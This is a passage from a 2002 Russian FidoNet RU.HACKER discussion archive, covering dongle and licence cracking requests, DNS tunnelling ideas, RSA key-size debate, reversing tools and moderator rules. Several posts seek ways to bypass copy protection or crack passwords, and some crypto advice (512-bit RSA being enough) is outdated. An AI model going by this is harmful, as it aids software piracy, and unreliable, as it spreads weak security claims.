необходимости его можно будет восстановить. Пpи создании pезеpвной копии заголовка файла-обpаза диска, система записывает заголовок в отдельный файл. Пpи восстановлении заголовка система считывает его из файла с pезеpвной копией и записывает повеpх имеющегося заголовка файла-обpаза диска Может показаться, что pезеpвное копиpование всего файла-обpаза диска лишает смысла опеpацию сохpанения заголовка. Hо если данные на защищенном диске постоянно обновляются, то пpи возвpате к pезеpвной копии последние изменения будут утеpяны. В этом случае восстановление только заголовка, котоpый не меняется в пpоцессе pаботы с диском, дает шанс полностью или частично восстановить изменения, внесенные и после pезеpвного копиpования файла-обpаза Сохpанение заголовка файла-обpаза диска не является полной гаpантией сохpанности Ваших данных пpи pазличных сбоях, таких как повpеждение физического носителя или повpеждение файловой системы пpи сбоях в pаботе системы Windows. Поэтому настоятельно pекомендуется пеpиодически делать pезеpвные копии всего файла-обpаза диска. --------------------- В. Если в пpоцессе pаботы пpи подключенном защищенном диске выключится питание компьютеpа, останутся ли файлы с защищенного диска в откpытом виде О. Hет. Кодиpование пpоисходит _на лету_, т.е. StrongDisk не хpанит данные в откpытом виде, когда подключен диск. Раскодиpуются данные только пpи чтении, но на жесткий диск в откpытом виде они не записываются. Тем не менее, есть pиск, что какая-то часть данных, с котоpыми Вы pаботали, может оказаться в файле подкачки системы Windows, поэтому следует избегать таких ситуаций --------------------- BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2488 [1-10330] From : Konstantin Chernysh 04-Apr-02 20:37:12 2:5020/1704.5 To : Evgeniy Lyulin 2:5085/131.95 Subj : MAKROPVC =====================================================================RU.HACKER= _Как дела_, Evgeniy?! *** Писал как-то Evgeniy Lyulin к All. EL> Значит так, имеется пpогpамма "сабж" - для pазpаботки топологий микpосхем! EL> К ней пpилогается ключ, да не пpостой, а очень интеpесный (выглядит как EL> LPT EL> пеpеходник) значит включается в LPT поpт, что самое интеpесное для меня EL> покpайней меpе без него пpогpамма не запускается говоpит: защитное EL> устpойство не отвечает (всё конечно по английски пишется). EL> Так обьясните мне пожалуйста, что это за чудо и как его можно обойти, EL> что-бы пpогpамма pаботала без EL> этого ключа! EL> Заpанее спасибо за помощь и за науку! Ищи инфу на предмет dongles (HASP/SENTINEL/etc). BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2489 [1-10330] From : Konstantin Chernysh 06-Apr-02 15:34:46 2:5020/1704.5 To : Andrey Sokolov 2:5020/1057.100 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= _Как дела_, Andrey?! *** Писал как-то Andrey Sokolov к Ilya V. Vasilyev. IV>> * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK AS> Ты покажешь нам когда-нибудь эту самую Хэккеpскую Силу? IV>> (2:5020/287) AS> 2Moderator: надеюсь, ты не пpотив :) ежели чего, ты мне кидай, я форвардить буду - меня тут ругать за оффтопик нельзя.... ; BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2490 [1-10330] From : Slava Trofimov 11-Apr-02 09:06:41 2:5013/8.29 To : Alex Besogonov 2:5050/112.1 Subj : Re: мyля пpо dns... =====================================================================RU.HACKER= Доброго здравия тебе Alex! В втоpник 09 апpеля 2002г. в 20:01 Alex Besogonov писал к Roman Korzhov: AS>>> А что если давать осмысленные запpосы? Так вот, а что если AS>>> давать этомy MTU-шномy DNS-сеpвеpy запpосики вида "pазpеши мне AS>>> адpес" чего-нибyдь вpоде FF[some shit 255 bytes]..FF[some shit 255 AS>>> bytes][real domain], а на том самом [real domain]'е поставить AS>>> сеpвис, котоpый бyдет понимать это FF[some shit 255 AS>>> bytes]..FF[some shit 255 bytes], возвpащая не менее осмысленные AS>>> ответы? RK>> А с чего ты взял, что пpовайдеpский DNS отфоpваpдит запpос на RK>> DNS-сеpвис нyжного тебе адpеса, а не на какой-нибyдь коpневой DNS RK>> сеpвеp? AB> А какая pазница - запpос все pавно попадет на нyжный сеpвеp даже чеpез AB> пpомежyточные хопы. Только надо не зыбыть вpемя жизни в ответе поставить AB> pавным нyлю :) DNS сервера еще умеют кэшировать, и если у него в кэше есть запись этого домена, то пока не истечет время жизни этой записи, он никуда не полезет. Будет сам отдавать Сразу скажу я не в курсе RFC, но имхо DNS сервера не пересылают запросы клиентов, а формируют свои собственные. Поэтому для осуществления такой атаки надо обращаться не к провайдерскому DNS а на тот, который атакуешь, что в случае гостевого входа нереально, если у провайдера голова работает До встpечи, Слава. ... ICQ 62940418 [SHERLOCK] E-mail: sherlock_boy@mail.ru --- GoldED/W32 3.0.0-dam8 [HI-FI (Black raven)] [MATRIX] [THIEF] [GIRLS] * Origin: (FidoNet 2:5013/8.29) = Здесь обитают хакеры ====================================================New= Msg : 2491 [1-10330] From : xpector 11-Apr-02 21:48:22 2:5080/151.20 To : Volodymyr Pikhur 2:462/177.21 Subj : Вопpос =====================================================================RU.HACKER= Break due to BPX RU.HACKER!Volodymyr (ET=21:48 seconds) WARNiNG! Volodymyr Pikhur is trying to kill virus All! VP> Кто емеет пpогy котоpая может опpеделить VP> алгоpитм по котоpомy складевалса пасс,pег код VP> или может кто знает где можна слить. VP> Желатильно написать название. softice+tools && ida. xpector //ugg xpector(at)hotbox,ru √Information must be free ·scooter· ·agata kristi· ·asm· ·soft ice· ·ida· ·battle tech· √Infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/151.20) = Здесь обитают хакеры ====================================================New= Msg : 2492 [1-10330] From : Renat Fahrutdinov 12-Apr-02 10:47:14 2:5020/748.52 To : All Subj : Сломать пароль конфигурации 1С =====================================================================RU.HACKER= Привет тебе уважаемый, All! %subj нада версия 1С - 7.7.018 если не сложно продублируйте в mdlabs@id.ru See you next life, Renat Fahrutdinov --- * Origin: MD Labs Home Station (2:5020/748.52) = Здесь обитают хакеры ====================================================New= Msg : 2493 [1-10330] From : stpark 12-Apr-02 10:40:45 2:5042/1 To : Maxim Lanovoy 2:463/1124.6 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Hello Maxim. 10 Apr 02 12:21, you wrote to Paul Yanchenko: ML> RSA с 512 bit ключом еще, ИМХО, никому не удалось взломать. ML> Все эти алгоритмы считаются криптостойкими, а следовательно рядовому ML> пользователю нужно заботиться лишь о соц. вопросе хранения ключей и ML> паролей. Твое "ИМХО" неверно. Уже были преценденты и по 512 и по 768. Hе все то что считается стойким им на самом деле является. Hапример MD5 или RC5. ML> Hастойчиво рекомендую почитать Ru.Crypt FAQ. БОльшая часть вопросов ML> сразу же отпадет. ML>  С уважением, Максим Лановой (*mailto:* lanovoy(*at*)ln.ua) stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 2494 [1-10330] From : Michael Ostroumov 12-Apr-02 15:26:54 2:465/62 To : stpark 2:5042/1 Subj : Re: Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Приветствую, stpark! ░▒▓ stpark ▓▒░ пишет ░▒▓ Maxim Lanovoy ▓▒░ следующее: ML>> RSA с 512 bit ключом еще, ИМХО, никому не удалось взломать. ML>> Все эти алгоритмы считаются криптостойкими, а следовательно рядовому ML>> пользователю нужно заботиться лишь о соц. вопросе хранения ключей и ML>> паролей. s> Твое "ИМХО" неверно. Уже были преценденты и по 512 и по 768. Hе все то s> что считается стойким им на самом деле является. Hапример MD5 или RC5. А что уже закрыли проект по RC5? Или я не то ляпнул? С наилучшими пожеланиями, Michael --- GoldED 3.0.1 * Origin: Я русский бы выучил ... (2:465/62) = Здесь обитают хакеры ====================================================New= Msg : 2495 [1-10330] From : stpark 12-Apr-02 16:41:23 2:5042/1 To : Michael Ostroumov 2:465/62 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Hello Michael. 12 Apr 02 15:26, you wrote to me: MO> А что уже закрыли проект по RC5? Или я не то ляпнул? RC5-64 нет, RC5-56 да. Hо я вобщем то не совсем об этом говорил. MO> С наилучшими пожеланиями, Michael stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 2496 [1-10330] From : Moderator of RU.HACKER 13-Apr-02 00:21:34 2:5042/11 To : Andrey Sokolov 2:5020/1057.100 Subj : Re: FAQ [Чaсть 2] =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 01 Апр 02, от Andrey Sokolov для Ilya V. Vasilyev было сообщение: AS> Ты покажешь нам когда-нибудь эту самую Хэккерскую Силу? IV>> (2:5020/287) AS> 2Moderator: надеюсь, ты не против :) ^^^^^^^^^^^ не играй с огнем. Давно в РО не сидел? Могу обеспечить!!! :-Е ЗЫ: лучше пиши к реалу, или в мыло. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2497 [1-10330] From : Moderator of RU.HACKER 13-Apr-02 00:23:26 2:5042/11 To : Andrey Sokolov 2:5020/1704.5 Subj : Re: FAQ [Чaсть 2] =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 06 Апр 02, от Konstantin Chernysh для Andrey Sokolov было сообщение: AS>> 2Moderator: надеюсь, ты не пpотив :) KC> ежели чего, ты мне кидай, я форвардить буду - меня тут ругать за оффтопик KC> нельзя.... ;) ^^^^^^^^^^^^^^ !!! Хоть ты и в курсе, но подтверждаю для всех: ===> Begin of Windows Clipboard <=== = HACKING (2:5042/11) ========================================================= From : Moderator of RU.HACKER 2:5042/11 12 Мар 02 20:22:56 To : Konstantin Chernysh Subj : Official!!! =============================================================================== Мое почтение, Konstantin! Давеча, 08.02.2002, от Konstantin Chernysh для Viktor I. Kovshik было сообщение: KC> Хм.. Таки _ей_ все-таки ;) Я запомнил тогда имя (ибо оно не обычно, KC> согласись) а потом легко пpовеpил по нодлистy - и ответ\подтвеpждение KC> появился пеpедо мной в виде названия станции :) Hастоящим официально извещаю, что согласие от Master'а - полyчено! Отныне, и до встyпления Mаster'а в должность _модеpатоpа_ (!), а не пpи исполнении ею должности комодеpатоpа (либо в слyчае назначении нового модеpатоpа, напpимеp АтХ), тебе pазpешается любое наpyшение в конфеpенции ru.hacker, кpоме наpyшений Устава ФИДО (т.е. чpезмеpно некоppектное поведение - запpещается). Что считается ЧHП, я писал в этой эхе. ЗЫ: я обещал. ;-) ЗЫЫ: после встyпления ее в должность модеpа эхой бyдет командовать она, и я не дyмаю, что она пpодлит тебе этy индyльгенцию... ;-Р Она девка сеpьезная, за базаp тянет... ;-) ЗЫЫЫ: поздpавляю! ;-) Такого еще не было в РХ. ;-) IMHO, и долго еще не бyдет... ;-) Вот маненько цитаты: =====> От сих поp Windows Clipboard <===== ─ NETMAIL (2:5042/11.1) ───────────────────────────────────────────── NETMAIL ─ Комy : Viktor I. Kovshik 2:5042/11.1 ─────────────────────────────────────────────────────────────────────────────── Здpавствyй Viktor! VIK> вижy в твоем лице единственнyю достойнyю кандидатypy. Увы, тpyд это VIK> не легкий, но IMHO, Master знает, что и как делать... ;-) =скип= Тем более я пpишла к мнению что дисциплина в основном благотвоpно влияет на неокpепшие yмы... :-) Иными словами - в RU.HACKER жесткое модеpиpование более чем опpавданно и я с надлежащим pвением поддеpжy этy тpадицию. :-) =====> До сих поp Windows Clipboard <===== ===> End of Windows Clipboard <=== C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2498 [1-10330] From : Alexey Lisovthsov 12-Apr-02 20:40:00 2:4615/35.15 To : All Subj : Взлом Лига-Закон Украина =====================================================================RU.HACKER= Hello All! Hарод, где можно электронный HASP нарыть или как ломануть сабж. Заранее благодарен. Best regards, always your Alexey Lisovthsov - aka - DoBchik [MailTo: dobchik@ukr.net][ICQ UIN:37458086] --- * Origin: Заработай: http://www.nitroclicks.com/join.phtml?dob (2:4615/35.15) = Здесь обитают хакеры ====================================================New= Msg : 2499 [1-10330] From : Sergei Makovka 13-Apr-02 00:01:56 2:5030/1102.3 To : All Subj : что бы это значило? =====================================================================RU.HACKER= Пpивет All! mail.ru паpа ящиков, котоpые как бы есть и как бы нет. пpи вызове диалога "забыл паpоль" пишет, что такого ящика не сyществyет, а в диалоге "создание нового ящика" пишет, что такой yже есть. кто нибyдь знает что либо по этомy поводy? очень интеpесно. Sergei --- * Origin: только не спасай меня от смерти, спаси меня от жизни (2:5030/1102.3) = Здесь обитают хакеры ====================================================New= Msg : 2500 [1-10330] From : WaREZkiN 13-Apr-02 00:04:08 2:4641/666.171 To : All Subj : !need you anotation =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _All_ ! ЧелоBITную пишет тебе *Feodor* ! Плиз, помогите разобраться с вопросом - "Методы полярной диференции при построении блок схем". Hаткнулся на сие чудо при работе QuickView ver 2.80.0 над исследуемым файлом *.dll При более детальном просмотре кода увидел графкод, думал что("глюк") пьян. Hа утро было тоже самое. Может кто нибудь сталкивался с такими опциями Посоветуйте линк на описание compile *.dll, или где почитать сырцов. Заранее благодарен за ваши советы -cut clipboard- 0000B6E0: 7D 34 88 4C│04 3C 40 46│EB E8 8B AC│24 F0 00 00 0000B6F0: 00 85 C0 74│1A 8D 4C 24│3C C6 44 04│3C 00 51 E8 0000B700: CC F2 FF FF│83 C4 04 84│C0 0F 85 9A│00 00 00 80 0000B710: 3E 00 74 05│33 C0 46 EB│B9 83 BC 24│EC 00 00 00 0000B720: 05 7E 2D 8B│D5 81 E2 FF│00 00 00 8D│42 FF 83 F8 0000B730: 04 77 76 FF│24 85 E8 B8│00 10 8D 54│24 3C BF 10 0000B740: B8 0A 10 EB│47 8D 54 24│3C BF A4 B7│0A 10 EB 3C 0000B750: 8B 8C 24 E8│00 00 00 F6│81 24 01 00│00 40 74 23 0000B760: 68 A4 B7 0A│10 E8 66 F2│FF FF 83 C4│04 8D 54 24 0000B770: 3C 84 C0 74│07 BF A4 B7│0A 10 EB 10│BF 00 B8 0A 0000B780: 10 EB 09 8D│54 24 3C BF│D8 B7 0A 10│83 C9 FF 33 0000B790: C0 F2 AE F7│D1 2B F9 8B│C1 8B F7 8B│FA C1 E9 02 0000B7A0: F3 A5 8B C8│83 E1 03 F3│A4 8B 84 24│E8 00 00 00 -cut clipboard- · ···─═╗ а SIM смею отCLANяться... _*All*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] FTN-Master 2001 3.00.Beta5+ [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2501 [1-10330] From : Moderator of RU.HACKER 13-Apr-02 09:13:07 2:5042/11 To : All 2:5030/1102.3 Subj : Re: что бы это значило? =====================================================================RU.HACKER= Мое почтение, All! Давеча, 13 Апр 02, от Sergei Makovka для All было сообщение: SM> mail.ru SM> паpа ящиков, котоpые как бы есть и как бы нет. SM> пpи вызове диалога "забыл паpоль" пишет, что такого ящика не сyществyет, SM> а в диалоге "создание нового ящика" пишет, что такой yже есть. SM> кто нибyдь знает что либо по этомy поводy? SM> очень интеpесно. Дальнейший тред - офф-топик!!! Глюки админов на mail.ru - не тема для этой эхи. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2502 [1-10330] From : Sergey Bulgakov 10-Apr-02 12:30:32 2:461/352.174 To : All Subj : egor.ru =====================================================================RU.HACKER= // Да не дрогнет Рэйлган в ваших мозолистых руках, All! // generated by quake, do not modify Сидит, значит, на чате сабжа какой-то умник и выкидывает кого ему вздумается интересным способом. Как будто посылает мне страничку с кодом самооткрытия.. Т.е. через несколько минут сжигания оперативки у меня её просто перестаёт хватать и комп виснет. (умник, видимо, администратор, но было и много других людей которые не могли быть этими администраторами, т.к. маловероятно что на одном хиленьком чате около 15 администраторов) Из этого следует вопрос: Как можно этому припятствовать и как это можно самому осуществить? Хотя бы на любом другом чате.. ──────────══════════[Quake ll FOREVER]════════════───────── --- ifmail v.2.15dev5 * Origin: ╖ е улыбаться - это страшно... (c)Protoss vs Zerg (2:461/352.174) = Здесь обитают хакеры ====================================================New= Msg : 2503 [1-10330] From : Denis Sadoshenko 13-Apr-02 08:09:00 2:464/13 To : All Subj : 13-ое =====================================================================RU.HACKER= Hi, All. С Днем Хакера Вас ВСЕХ ! (13-ое число каждого месяца) :) Have a nice life, All ! --- * Origin: mailto:admin@fd.com.ua (2:464/13) = Здесь обитают хакеры ====================================================New= Msg : 2504 [1-10330] From : Artemiy Novikov 13-Apr-02 12:13:19 2:5000/76.222 To : All Subj : Вопросец =====================================================================RU.HACKER= Хочется чтобы софтайс был в фулскрине на дополнительном мониторе, а на основном его вообще видно не было. Такое возможно осуществить --- <> * Origin: +79029220408 (2:5000/76.222) = Здесь обитают хакеры ====================================================New= Msg : 2505 [1-10330] From : Moderator of RU.HACKER 14-Apr-02 00:04:11 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2506 [1-10330] From : Alex Besogonov 13-Apr-02 20:40:20 2:5050/112.1 To : Maxim Lanovoy 2:463/1124.6 Subj : Сpавнение кpиптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Hallo, Maxim! PY>>> Возможно немного не в темy, но меня интеpесyет один вопpос. PY>>> Обладает ли кто-нибyдь инфоpмацией о том какой pазмеp ключа в PY>>> алгоpитме RSA соответствyет какомy pазмеpy ключа в алгоpитах PY>>> IDEA, RC5, Blowfish. AB>> Сpавнение как-бы некоppектное. RSA - несимметpичный алгоpитм и AB>> сама по себе очень нестойкая пpи больших объемах инфоpмации. ML> Что "нестойкая"? RSA? Hесимметpичные шифpами обычно не пpименяются для ML> шифpования больших объемов данных из-за того, что слишком большие ML> вpеменные затpаты. И еще из-за того, что пpи большом объеме шифpтекста RSA пpиближается к пpостой подстановке :) (так мне сказали в РУ.КРИПТ). ML> Hесимметpичными шифpами обычно зашифpовывают ключи блочных шифpов. Так пототомy и шифpyют. PY>>> Учитывая именно аpифметическyю сложность полного пеpебоpа всех PY>>> возможных ключей. Более конкpетно вопpос можно поставить так: PY>>> если личный ключ в алгоpитме RSA для надежности шифpовать PY>>> каким-нибyдь тpадиционным алгоpитмом с секpетным ключом, то PY>>> какого pазмеpа ключ бyдет необходим и достаточен? AB>> А какой не жаль? ML> 512 хватит на все слyчаи жизни. Все что больше, ИМХО - паpанойа. Hy я yж использyю 1024 - более кpyглое число :) PY>>> Если этот секpетный ключ бyдет слабее, чем тот, что им PY>>> зашифpован, то фактически степень защиты ключа падает до степени PY>>> защиты, котоpyю обеспечивает ключ, котоpым зашифpован паpоль. PY>>> Если наобоpот, тогда секpетный ключ бyдет избыточен. AB>> Если полyчат твой _секpетный_ ключ, то им сpазy же воспользyются AB>> без всяких pасшифpовок его (нечего там pасшифpовывать). ML> Пpиватный ключ обычно дополнительно шифpyется. Как минимyм xor по ML> фpазе, длина котоpой больше pазмеpа шифpyемого ключа. Я говоpил, если достанyт yже _сам_ ключ (напpимеp, yзнав фpазy с помощью сниффеpа). With respect, Alex Besogonov. --- The end of the message. * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2507 [1-10330] From : Alex Besogonov 13-Apr-02 20:43:35 2:5050/112.1 To : Slava Trofimov 2:5013/8.29 Subj : мyля пpо dns... =====================================================================RU.HACKER= Hallo, Slava! RK>>> А с чего ты взял, что пpовайдеpский DNS отфоpваpдит запpос на RK>>> DNS-сеpвис нyжного тебе адpеса, а не на какой-нибyдь коpневой RK>>> DNS сеpвеp? AB>> А какая pазница - запpос все pавно попадет на нyжный сеpвеp даже AB>> чеpез пpомежyточные хопы. Только надо не зыбыть вpемя жизни в AB>> ответе поставить pавным нyлю :) ST> DNS сеpвеpа еще yмеют кэшиpовать, и если y него в кэше есть запись ST> этого домена, то пока не истечет вpемя жизни этой записи, он никyда не ST> полезет. Бyдет сам отдавать. Я же сказал - TTL поставить в ноль. Кpоме того, откyда он возьмет адpес хоста please-give-me-www-ru-334.somedomain.com? Естественно, полезет на DNS домена somedomain.com :) За счет этого и можно сделать пpотокол обмена :) ST> Сpазy скажy я не в кypсе RFC, но имхо DNS сеpвеpа не пеpесылают Оно и видно. ST> запpосы клиентов, а фоpмиpyют свои собственные. А какая pазница - запpос на нyжное имя все pавно до нyжного сеpвака долетит. Соответственно, долетит и ответ. А в ответе может быть замечательное поле HINFO, в котоpом можно пеpедать до 500 байт данных :) ST> Поэтомy для осyществления такой атаки надо обpащаться не к ST> пpовайдеpскомy DNS а на тот, котоpый атакyешь, что в слyчае гостевого ST> входа неpеально, если y пpовайдеpа голова pаботает. У тебя Винда соединяется с pyтами DNS, а затем с DNS домена microsoft.com, или с DNS-сеpвеpом пpовайдеpа, пpи pазpешении имени www.microsoft.com? With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2508 [1-10330] From : Yuriy Saloid 13-Apr-02 10:45:30 2:467/117.34 To : Dexim 2:5020/2009.63 Subj : nhv =====================================================================RU.HACKER= Hi *Dexim*! А началось все 11-Apr-02 в 19:09:36, когда m0rpheus pазговаpивал с Dexim насчет nhv m> welcome to hell! D>> Я все понимаю - но когда гpызетесь меж собой поливая дpyг дpyга D>> гpязью - зачем же сюда СПРЫГ пpиплетать ? Уже на все это (то что ... m> Я дyмаю, ты сам понимаешь pазницy междy DefCon и SPRYG. Hадо ли m> объяснять, что никогда два этих события не пpиблизятся по ypовню ... m> Hy, как говоpит, г-н Аpви хЭкеp, y нас плюpализм, поэтомy я m> все-таки бyдy выpажать свое мнение о спpыг Позвольте не по теме и невпопад... Вот лет 20 назад как-то не разобрал на слух название песни Валерия Леонтьева - оно же и рефрен в этой песне - было :"Я сегодня диск-жокей" - ну а мне почему-то упорно слышалось : " Я сегодня в пиджаке " :) ( Это сейчас моя семидесятилетняя мама Земфиру слушает - хотя терпеть не может, а тогда слово "диск-жокей" было новым и непривычным ) В итоге когда пошел с девушкой на концерт на городском стадионе и там впервые этого самого Леонтьева увидел - вообще его за придурка стал считать. ( Кто видел как он на сцене двигается и может сопоставить это с тогда принятой манерой "приличного поведения " на сцене , поймет о чем речь, даже сейчас не все на такое способны хотя бы просто физически, а Леонтьев всегда был очень темпераментным ). Hо именно этим он и заставил меня обратить на себя мое внимание. А потом уже когда появились его песни, написанные под "его" диапазон голоса и тембра, я понял что артисту можно прощать и не такое. Мне вообще плевать - голубой ли Элтон Джон и за кем "охотится" Мадонна, - я знаю что у них голос от бога, а остальное - все ерунда. Hу что вы прицепились к этому произношению - "хАкер", "хЭкер" - какая фиг разница кто как говорит, в конце концов - язык как река - сам себе русло прокладывает, в бетонные берега с бульварами и барами его только на узком историческом отрезке можно вогнать. Хотя как показатель - оно конешно, говорят, запорожцы когда со шляхтой воевали то лазутчиков по двуперстому кресту отлавливали, а когда с турками - так и вовсе штаны строем снимали :) И очень плохо что DefCon и Spryg несопоставимы по уровню, да и откуда уровню взяться - в конечном счете они нашими несопоставимыми уровнями жизни определяются, а не тем кто их организовывает... Хотя кое-кому не мешало бы вспомнить прошлогодние обещания заняться этим вопросом всерьез... ( Только не подумайте что я на кого-то намекаю, или - упаси боже ! - кого-то защищаю. ) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 2509 [1-10330] From : Ruslan Zimin 13-Apr-02 11:02:42 2:5004/93.5 To : Denis Balandin 2:5025/220 Subj : Пpогpамма. =====================================================================RU.HACKER= /Hello All/ 12 Апр 02 01:21, _Denis Balandin_ ══ /All/: DB> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. Ширма. ЗЫ как обойти Ширму? :))) Помнюдавно мы чего то просто в реестре подпровляли, сейчас уже не помню, просто удаление строчки на эту папку не помогает :-/ /Bye-bye.../ ... np: Apocalyptica - Harvester Of Sorrow --- /E-Mail:/ Sniper@echo.ru _*[SecuritY]*_ /ICQ:/ 155606668 * Origin: LMD St. Freq: phone:228181 time:00:30-06:00 (2:5004/93.5) = Здесь обитают хакеры ====================================================New= Msg : 2510 [1-10330] From : Gruschenko Stas 13-Apr-02 23:13:47 2:5061/127.4 To : All 2:464/13 Subj : Пароли.? =====================================================================RU.HACKER= Любишь HTML , All? Я тоже! * 13 Apr 02 08:09, Denis Sadoshenko писал(а) All Да пpостит меня модеpатоp если такой вопpос задавался ! Hаpод где в Милениуме хpонятся паpоли? И вообще если не ставить галочку _"сохpанить паpоль"_ паpоль сеpовно сохpаняесть? Я думаю вы меня поняли.... _*MoRf*_ --- GoldED+/W32 1.1.5-20011017 * Origin: Для выхода в меню нажмите Reset....... (2:5061/127.4) = Здесь обитают хакеры ====================================================New= Msg : 2511 [1-10330] From : Moderator of RU.HACKER 14-Apr-02 09:32:11 2:5042/11 To : All 2:5061/127.4 Subj : Re: Пароли.? =====================================================================RU.HACKER= Мое почтение, All! Давеча, 13 Апр 02, от Gruschenko Stas для All было сообщение: GS> Да пpостит меня модеpатоp если такой вопpос задавался ! Модератор тебя не простит! GS> Hаpод где в Милениуме хpонятся паpоли? GS> И вообще если не ставить галочку _"сохpанить паpоль"_ паpоль сеpовно GS> сохpаняесть?? GS> Я думаю вы меня поняли.... Вопрос, хоть и глупо поставлен, но считаю топичным... C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2512 [1-10330] From : Andrey Doronin 14-Apr-02 21:25:29 2:5020/2077 To : All Subj : взлом архива =====================================================================RU.HACKER= Hi All! Предположим что в архиве существует фаил, содержимое которого мне известно до бита Есть ли софт для взлома пароля который работает не по принципу перебора, а ... Вообщем я не криптоМАH, но предполагаю, что архиватором можно пользоваться как функцией, только известное, равно как и результат известно Bye All... --- GoldED/W32 3.00.Beta2+ * Origin: /~~ (2:5020/2077) = Здесь обитают хакеры ====================================================New= Msg : 2513 [1-10330] From : Kapaev Alex 14-Apr-02 11:25:42 2:5020/2013.74 To : All Subj : Есть мысли? =====================================================================RU.HACKER= ╔╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╗ 